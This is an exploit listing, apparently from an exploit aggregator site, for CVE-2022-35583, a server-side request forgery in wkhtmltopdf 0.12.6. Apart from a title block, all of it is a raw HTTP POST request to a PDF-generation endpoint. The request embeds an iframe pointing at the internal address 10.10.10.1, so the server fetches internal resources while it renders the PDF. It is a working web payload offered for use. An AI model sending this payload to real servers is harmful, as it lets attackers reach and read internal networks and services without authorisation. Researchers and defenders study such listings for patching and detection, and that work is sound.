Exploit for wkhtmltopdf 0.12.6 Server-Side Request Forgery CVE-2022-35583

Name: Exploit for wkhtmltopdf 0.12.6 Server-Side Request Forgery CVE-2022-35583
Rating: 5 (141 reviews)

2023-03-24 | CVSS 9.4

## https://sploitus.com/exploit?id=PACKETSTORM:171446
# Exploit Title: wkhtmltopdf 0.12.6 - Server Side Request Forgery  
# Date: 20/8/2022  
# Exploit Author: Momen Eldawakhly (Cyber Guy)  
# Vendor Homepage: https://wkhtmltopdf.org  
# Software Link: https://wkhtmltopdf.org/downloads.html  
# Version: 0.12.6  
# Tested on: Windows ASP.NET <http://asp.net/>  
  
POST /PDF/FromHTML HTTP/1.1  
Host: vulnerable.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: <length>  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close  
  
__RequestVerificationToken=Token&header=<PDFstructure+>....&data= <PDFstructure+>....<iframe+src=“http://10.10.10.1”>